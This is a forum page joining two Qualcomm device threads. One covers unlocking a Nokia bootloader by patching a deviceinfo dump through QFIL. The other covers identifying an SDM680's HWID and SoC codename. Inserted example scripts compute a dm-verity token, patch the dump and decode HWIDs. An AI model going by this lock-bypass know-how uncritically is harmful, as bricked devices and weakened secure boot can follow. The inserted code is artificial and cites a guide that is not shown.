To reinstall stock firmware, follow the guide on Nokia 7 plus forum:
https://forum.xda-developers.com/nokia-7-plus/how-to/workaround-flashing-oreo-firmware-t3793791
Required service abl/xbl and firehose for Nokia 6.1 and Nokia 7:
https://drive.google.com/open?id=1lN24vWc8edc_i9BINRTyg-bsNpsKfqCs
Extract password is "WLBGFIH123" (without quotes)
Special thanks:
@heineken78 for Sharp Aquos S2 bootloader unlock
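The two byte-level steps of the guide, the md5 of the fastboot serial that is passed to `fastboot oem dm-verity` and the one-byte edit of the deviceinfo dump at 0x5101, are easy to get wrong in a hex editor. The following is an added example, not the guide author's tooling and not anything shipped with OST LA or QFIL. It implements exactly the precondition in Part 4 step 5 (data present between 0x5000 and 0x5100) and refuses to patch when it is not met; the sample dump it builds is constructed data, not a real deviceinfo partition.

```python
"""Compute the dm-verity token and patch a deviceinfo dump for the guide above.

Added example, not the guide author's code. Offsets 0x5000-0x5100 (data that
must be present) and 0x5101 (byte to set to 0xFF) are taken from Part 4 step 5.
"""
import hashlib
import sys

DATA_START = 0x5000
DATA_END = 0x5100          # exclusive
PATCH_OFFSET = 0x5101
PATCH_VALUE = 0xFF


def dm_verity_token(serial):
    """md5 hex digest of the serial string shown by `fastboot devices`."""
    return hashlib.md5(serial.encode("ascii")).hexdigest()


def has_unlock_data(dump):
    """True if the dump is long enough and 0x5000..0x50FF is not all zeros."""
    if len(dump) <= PATCH_OFFSET:
        return False
    return any(dump[DATA_START:DATA_END])


def patch_deviceinfo(dump):
    """Return a copy of the dump with byte 0x5101 set to 0xFF.

    Raises ValueError when the guide's precondition is not met, so an
    unsuitable device is never written to. Only one byte changes; the
    original dump is not modified in place.
    """
    if not has_unlock_data(dump):
        raise ValueError("no data between 0x5000 and 0x5100; this method does not apply")
    patched = bytearray(dump)
    patched[PATCH_OFFSET] = PATCH_VALUE
    return bytes(patched)


def make_sample_dump(with_data=True, size=0x6000):
    """Constructed deviceinfo-like blob for demonstration only (not a real dump)."""
    dump = bytearray(size)
    if with_data:
        for i in range(DATA_START, DATA_END):
            dump[i] = (i * 73 + 19) & 0xFF
        dump[0x5100] = 0x06          # mirrors the 06 shown at 0x5100 in the guide
    return bytes(dump)


if __name__ == "__main__":
    # usage: python patch_deviceinfo.py <serial> <ReadData_...bin>
    serial, path = sys.argv[1], sys.argv[2]
    print("fastboot oem dm-verity", dm_verity_token(serial))
    with open(path, "rb") as f:
        original = f.read()
    with open("deviceinfo_mod.bin", "wb") as f:
        f.write(patch_deviceinfo(original))
    print("wrote deviceinfo_mod.bin")
```

The script writes deviceinfo_mod.bin next to itself; as a later reply in this thread notes, QFIL may only accept the file from its own COMPORT_* working directory, so copy it there before "Load Image".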
Hello and thanks for sharing.
One question: how can we extract the service abl/xbl as well as the firehose from the stock ROM?
I have a Nokia 2 and would very much like to unlock it.
I did extract the stock ROM (and also boot.img, system.img, recovery.img), but I don't know how to get the service abl/xbl and the firehose firmware.
Can you help me on that?
Thanks
Hi,
Today I was brave enough to risk and dump 200$(TA-1054) in the garbage.
I've followed the procedure up to the modified deviceinfo upload.
For me QFIL wouldn't write the modified bin file to the device unless it was in the folder %AppData%\Qualcomm\QFIL\COMPORT_ (the working directory).
After writing it, though, the rest was up to the letter.
I'm currently updating to 8.0 and will post feedback how it works after the updates.
Also, for some reason, I don't have a _b slot. Should I worry?
C:\Program Files (x86)\Minimal ADB and Fastboot>fastboot --set-active=_b
Setting current slot to 'b'...
FAILED (remote: Invalid Slot Suffix)
finished. total time: -0.000s
Edit:
The phone is now updated to 8.1 august patch.
Everything I've tested since yesterday works as before, except wi-fi hotspot (I've read it's some 8.1 issue) and mobile data. I'll do some testing to try and figure out where this problem came from.
Edit2:
For some reason mobile data is not working after installing the August update. I restored it back to the July update and everything seems to be OK (including wi-fi hotspot).

How to find "hw_soc_version" for a QCom SOC?

I have an Android device with a QComm SDM680 SOC. The QCom part# of the SOC is SM6225.
How do I find the "hw_soc_version" and "soc_version" of the SDM680/SM6225 ?
I've found some general scripts that collate this type of info, like this one. But the SDM680 is not in any of those lists.
I've searched on the rooted device, grepped the kernel logs and the kernel opensource. fastboot getvar all doesn't expose this info either.
Does anybody know how to find these values?
Oh, that's easy. You just run an EDL client, they always ask the HWID.
You don't even need to have a loader for it.
On my EDL client just:
Code:
C:\>edl /l
Found EDL 9008
Serial: 12345678
HWID: 000cc0e100000000, QC: 000cc0e1, OEM: 0000, Model: 0000
Hash: 7be49b72f9e43372-23ccb84d6eccca4e-61ce16e3602ac200-8cb18b75babe6d09
You can also attach a UART while booting.
Code:
Format: Log Type - Time(microsec) - Message - Optional Info
Log Type: B - Since Boot(Power On Reset), D - Delta, S - Statistic
S - QC_IMAGE_VERSION_STRING=BOOT.XF.1.4-00246-S660LZB-1
S - IMAGE_VARIANT_STRING=Sdm660LA
S - OEM_IMAGE_VERSION_STRING=cibuild
S - Boot Interface: Unknown
S - Secure Boot: Off
S - Boot Config @ 0x00786070 = 0x000001c1
S - JTAG ID @ 0x00786130 = 0x000cc0e1
Note that even though this is an SDM636 the log speaks of 660, but the "JTAG ID" is the correct HWID.
Usually the certs in xbl/abl have the HW_ID in them.
Also:
Code:
Teletex string 11 3007 0000 0000 0000 0000 0000 0000 0000 0000 0000 SOC_VERS
(I've never run into this soc_version before.)
Also, AFAIK, your friendly Firehose loader repository doesn't have a loader for this.
Edit: Oh, you're not looking for the HWID?
Renate said:
Oh, that's easy. You just run an EDL client, they always ask the HWID.
You don't even need to have a loader for it.
On my EDL client just:
Code:
C:\>edl /l
Found EDL 9008
Serial: 12345678
HWID: 000cc0e100000000, QC: 000cc0e1, OEM: 0000, Model: 0000
Hash: 7be49b72f9e43372-23ccb84d6eccca4e-61ce16e3602ac200-8cb18b75babe6d09
...
Edit: Oh, you're not looking for the HWID?
Thanks for the tip. I checked the SAHARA output. It seems that this HWID consists of the MSM_ID+OEM+MODEL. For the SDM680 I got: HW_ID: 0x001b80e100000000 (MSM_ID=0x001b80e1 OEM_ID=0x0000 MODEL_ID=0x0000).
Looking at bkerler's qualcomm_config.py, it seems that the hw_soc_version and hwid are two different things. For example for the SDM660, the msmid entry is 0x08C0E1, with a comment that the soc_hw_version is different:
Code:
0x08C0E1: "SDM660", # 0x30060000 soc_hw_version
Renate said:
Usually the certs in xbl/abl has the HW_ID in it.
Even though it's about the HWID, I looked into this too. It seems that around 2016, the HWID was stored in OU fields of the certificates in the XBL file (see pages 10-11). But after 2019, it is stored in the metadata of the MBN image (see page 9) within the XBL file. I only mention it because I thought it might prove useful for you.
Curiously, the HWID wasn't in the certs or metadata in my stock ROM's xbl.elf. Strange.
Yahoo Mike said:
For the SDM680 I got: HW_ID: 0x001b80e100000000...
The good news for you is that it's not stamped OEM/model.
There's some chance that this is not SecureBoot.
Which means that any loader that's compatible with your SoC will work.
What does this say: fastboot getvar secure
What does this say: cat /proc/cpuinfo (Just the name line.)
You can also look in the DTB, either decoded or raw, it's at the beginning.
Then there's the other wrinkle that Qualcomm has SDM numbers, MSM numbers and code names for SoCs.
Maybe that cpuinfo will tell you a codename.
Renate said:
The good news for you is that it's not stamped OEM/model.
There's some chance that this is not SecureBoot.
Which means that any loader that's compatible with your SoC will work.
What does this say: fastboot getvar secure
I think SecureBoot is on. I've had to do a test-points recovery a few times - after I tried to run with a patched (and incorrectly signed) ABL.
In fastbootd & bootloader menus, it says SecureBoot is on. And (as you suggested) fastboot utility agrees:
Code:
C:\>fastboot getvar secure
secure: yes
Finished. Total time: 0.001s
Renate said:
What does this say: cat /proc/cpuinfo (Just the name line.)
You can also look in the DTB, either decoded or raw, it's at the beginning.
Then there's the other wrinkle that Qualcomm has SDM numbers, MSM numbers and code names for SoCs.
Maybe that cpuinfo will tell you a codename.
The codename is khaje.
Code:
TB128FU:/ # cat /proc/cpuinfo
Processor : AArch64 Processor rev 4 (aarch64)
...<info about 8 processors>...
Hardware : Qualcomm Technologies, Inc KHAJE
That agrees with the run-time /sys/devices/soc0/soc_id value of 518, which is "khaje" according to the stock ROM's /vendor/bin/init.qti.display_boot.sh and /vendor/bin/init.qcom.post_boot.sh.
Curiously, at the beginning of the DTB it says it's "Bengal":
Code:
00 00 00 03 00 00 00 33 00 00 00 00 51 75 61 6C .......3....Qual
63 6F 6D 6D 20 54 65 63 68 6E 6F 6C 6F 67 69 65 comm Technologie
73 2C 20 49 6E 63 2E 20 42 65 6E 67 61 6C 20 31 s, Inc. Bengal 1
47 62 20 44 44 52 20 48 44 2B 20 53 6F 43 00 00 Gb DDR HD+ SoC..
But at offset 0x2A62D0 it changes its name:
Code:
00 00 00 00 00 03 00 00 00 26 00 00 00 00 51 75 .........&....Qu
61 6C 63 6F 6D 6D 20 54 65 63 68 6E 6F 6C 6F 67 alcomm Technolog
69 65 73 2C 20 49 6E 63 2E 20 4B 68 61 6A 65 20 ies, Inc. Khaje
53 6F 43 00 00 00 00 00 00 03 00 00 00 0B 00 00 SoC.............
I can't believe how many different numbers/strings QCom has to describe a SoC: soc_id, codename, hwid, msm_id ... and the ever-elusive hw_soc_version.
Anyway, I'll load up this SoC's firehose program to bkerler's edl. I'll slip in a question about how to query the hw_soc_version. I'll post back any reply.
Yahoo Mike said:
The codename is khaje.
Khajeh is a city in Iran: https://en.wikipedia.org/wiki/Khajeh,_Iran
Yahoo Mike said:
Curiously, at the beginning of the DTB it says...
That's because you are probably looking at multiple DTBs.
You can simply grep/scan for "Qualcomm Technologies".
I don't know why they do that.
The abl scans through them and find the one that best matches.
S/N: 0x7BD1BDD5
HW ID: 0x001B80E10015006D -> HUAWEI
HASH: 0xB25DECD85D217F5D9B53DC3C42EF7846DCEF59DD3E0AF4D12606199F5099FF23D73C3AFFBE5EFBF421A81A197E41FDF5
PBL : 0x00000000
HASH TYPE: SHA384
DEV HASH: 0x0000003AC0D4
CPU : Undefined CPU: 001B80E10015006D
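The replies above split the 64-bit HWID into MSM_ID, OEM_ID and MODEL_ID by hand, and suggest scanning the kernel's (multi-)DTB for "Qualcomm Technologies" model strings to find the SoC name. The following is an added example, not the posters' tools or bkerler's edl. The field split (MSM_ID in the upper 32 bits, then 16-bit OEM_ID and MODEL_ID) follows the values quoted in the thread; the DTB walker relies only on the standard flattened-device-tree header (magic 0xD00DFEED, big-endian totalsize at offset 4). The two minimal DTBs it builds are constructed to carry the exact model strings and FDT_PROP lengths (0x33 and 0x26) seen in the posted hexdumps, nothing more.

```python
"""Decode a Qualcomm HWID and list SoC model strings in a concatenated DTB blob.

Added example, not any poster's tool. HWID layout follows the thread:
HWID = MSM_ID (32 bit) << 32 | OEM_ID (16 bit) << 16 | MODEL_ID (16 bit).
"""
import re
import struct

FDT_MAGIC = 0xD00DFEED
FDT_HEADER_LEN = 40
FDT_PROP = 3


def split_hwid(hwid):
    """Split a 64-bit HWID (int or hex string) into (msm_id, oem_id, model_id)."""
    if isinstance(hwid, str):
        hwid = int(hwid, 16)
    msm_id = (hwid >> 32) & 0xFFFFFFFF
    oem_id = (hwid >> 16) & 0xFFFF
    model_id = hwid & 0xFFFF
    return msm_id, oem_id, model_id


def is_oem_stamped(hwid):
    """True if OEM_ID or MODEL_ID is non-zero, i.e. a generic loader for the
    MSM_ID alone is unlikely to be accepted by a secure-boot device."""
    _, oem_id, model_id = split_hwid(hwid)
    return oem_id != 0 or model_id != 0


def iter_dtbs(blob):
    """Yield (offset, totalsize) for each FDT concatenated in the blob.

    abl picks the best-matching DTB out of several; this walks them in order.
    Stops at the first position that is not a well-formed FDT header.
    """
    off = 0
    while off + 8 <= len(blob):
        magic, size = struct.unpack_from(">II", blob, off)
        if magic != FDT_MAGIC or size < FDT_HEADER_LEN or off + size > len(blob):
            break
        yield off, size
        off += size


def dtb_model_strings(blob):
    """All NUL-terminated strings starting with 'Qualcomm Technologies', in file order."""
    return [m.group(0).decode("ascii")
            for m in re.finditer(rb"Qualcomm Technologies[^\x00]*", blob)]


# --- constructed sample: two minimal FDTs, each with one FDT_PROP holding the model ---
def make_dtb(model):
    """Header + a single FDT_PROP token (len, nameoff=0) carrying the model string."""
    value = model.encode("ascii") + b"\x00"
    padded = value + b"\x00" * (-len(value) % 4)       # FDT props are 4-byte aligned
    prop = struct.pack(">III", FDT_PROP, len(value), 0) + padded
    total = FDT_HEADER_LEN + len(prop)
    header = struct.pack(">II", FDT_MAGIC, total) + b"\x00" * (FDT_HEADER_LEN - 8)
    return header + prop


SAMPLE_BLOB = (make_dtb("Qualcomm Technologies, Inc. Bengal 1Gb DDR HD+ SoC")
               + make_dtb("Qualcomm Technologies, Inc. Khaje SoC"))

if __name__ == "__main__":
    for h in ("001b80e100000000", "001B80E10015006D", "000cc0e100000000"):
        msm, oem, model = split_hwid(h)
        print(f"{h}: MSM_ID=0x{msm:08x} OEM_ID=0x{oem:04x} MODEL_ID=0x{model:04x}"
              f" stamped={is_oem_stamped(h)}")
    for off, size in iter_dtbs(SAMPLE_BLOB):
        print(f"DTB at 0x{off:x}, {size} bytes")
    print(dtb_model_strings(SAMPLE_BLOB))
```

Run against a real dtb.img or the DTB appended to a boot image, dtb_model_strings() returns one name per embedded DTB, which is why the poster saw "Bengal" at the start of the file and "Khaje" further in. None of this yields the separate hw_soc_version the thread is looking for; that value is not in the HWID.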
